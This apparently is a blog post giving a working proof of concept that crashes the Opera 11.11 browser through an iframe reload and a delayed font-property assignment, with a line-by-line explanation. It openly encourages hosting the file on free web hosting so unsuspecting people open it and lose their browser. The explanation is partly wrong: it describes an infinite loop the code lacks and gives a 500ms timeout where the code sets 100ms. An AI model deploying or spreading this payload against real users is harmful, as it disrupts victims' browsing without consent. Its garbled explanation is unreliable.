Opera 11.11 Crash Vulnerabilty Discussion



Opera 11.11 Web browser , which is vulnerable to DOS, and can be used to crash it down remotely. The trick lies in refreshing/ reloading an IFRAME and then putting an infinite loop on some of its element. For this time we are going to use Font element.
So open up your Opera and load the exploit [which is in an HTML file] into it. You can get the exploit code from here.
 
Save this text in form of a HTML file. When we open this file in opera, goes up and crashes it down within a fraction of seconds. The best part of this exploit is, you can also crash an Opera remotely, say uploading our file to any of the free web hosting sites and then asking someone to open it. Doing so would crash his opera down.

 Anyways, lets discuss the code.

1
2
3
4
5
6
7
8
9
10
11
12
13
<html>
  <body>
   <iframe src='about:blank' id='bo0om' style="width:0px;height:0px;border:0px none;">iframe>
   <script type="text/javascript"  language="javascript">
      
      var a = window.document.getElementById('bo0om');
      var b = a.contentDocument.createElement('font');
      a.src='about:blank';
      setTimeout('b.face = "h3h";',100);
      
   script>
  body>
html>



1.
<iframe src='about:blank' id='bo0om' style="width:0px;height:0px;border:0px none;">iframe>

As you can see, we had taken an iframe with id =bo0om with no source code, no height and no width.
2.

var a = window.document.getElementById('bo0om');


Then we took a variable ‘a’ and loaded the iframe into it.
 
3.

var b = a.contentDocument.createElement('font');
Taking ‘a’ into ‘b’, i.e. whole iframe into ‘b’ and then adding an element font which I fiscussed in the very first paragraph of this article.


4.
setTimeout('b.face = "h3h";',100);

Now setting the timeout to be 500ms, we are asking our page to load “h3h” into font element of iframe bo0om, (b.face or we can say a.font.face or ultimately bo0om.font.face= ‘h3h’).




Now the point is, this whole code is going to do the same amount of work in an infinite loop and thus and opera will continuously keep doing this. Due to the memory it would consume in performing this all, it crashes.

This is the Error report I got in on my screen. You can get some difference. 

             http://localhostr.com/file/1Tq9Ti9/crash20110928182514.txt

0 Responses to “Opera 11.11 Crash Vulnerabilty Discussion”

Post a Comment

Subscribe to: Post Comments (Atom)